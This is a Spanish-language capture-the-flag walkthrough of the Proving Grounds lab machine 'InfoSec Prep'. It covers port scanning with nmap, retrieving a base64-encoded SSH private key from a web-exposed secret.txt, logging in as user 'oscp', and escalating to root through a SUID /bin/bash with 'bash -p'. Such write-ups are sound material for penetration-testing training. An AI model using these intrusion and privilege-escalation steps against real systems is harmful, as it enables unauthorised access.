🟢InfoSec Prep
Write-up de la máquina InfoSec Prep de Proving Grounds #writeup #walkthrough
Last updated
Was this helpful?
Write-up de la máquina InfoSec Prep de Proving Grounds #writeup #walkthrough
Last updated
Was this helpful?
Was this helpful?
Comenzamos realizando un escaneo rápido de los puertos que tiene abiertos la máquina víctima.
nmap -p- --open -vvv -Pn -n --min-rate 2000 192.168.148.89
Están abiertos los puertos 22,80 y 33060 TCP en la máquina objetivo. El siguiente paso es realizar un escaneo más profundo únicamente de los servicios abiertos.
nmap -p22,80,33060 -sVC -vv -Pn -n 192.168.148.89
Tres servicios abiertos:
Puerto 22 -> OpenSSH 8.2p1
Puerto 80 -> Apache httpd 2.4.41
Puerto 33060 -> MySQLx ?
Tenemos disponible un servidor Web en el puerto 80. Vamos a ver el contenido en el navegador.
Vemos un sitio Web Wordpress. Vamos a inspeccionar el sitio Web para buscar información interesante.
Durante el escaneo intensivo de NMAP, vimos lo siguiente:
Vamos a abrir este archivo en el navegador.
Descargamos este archivo de la siguiente manera:
wget http://192.168.148.89/secret.txt
Tenemos un archivo con contenido codificado posiblemente en base64. Vamos a decodificarlo de la siguiente manera:
cat secret.txt | base64 -d
Es una clave privada. Vamos a crear un archivo id_rsa con la clave descifrada.
cat secret.txt | base64 -d | tee id_rsa
Debemos configurar los permisos adecuados para clave privada id_rsa. A continuación, la utilizaremos para iniciar sesión a través del servicio SSH con el usuario "oscp".
Configuramos los permisos para id_rsa.
chmod 600 id_rsa
Y nos conectamos a través de SSH.
ssh [email protected] -i id_rsa
Ya tenemos conexión con la máquina víctima. Buscamos la flag local.txt
Probamos las diversas formas de elevar privilegios con sudo pero para todas es necesario conocer una contraseña. Vamos a enumerar archivos que tienen activo el bit SUID. Para ello, ejecutamos lo siguiente:
find / -perm -u=s -type f 2>/dev/null
Tenemos un binario /bin/bash, que puede ser interesante. Para ejecutar este binario:
/bin/bash -p
Ya tenemos privilegios máximos dentro de la máquina víctima. Ahora buscamos la flag para completar la máquina.
Ya tendríamos acabado el CTF Infosecprep.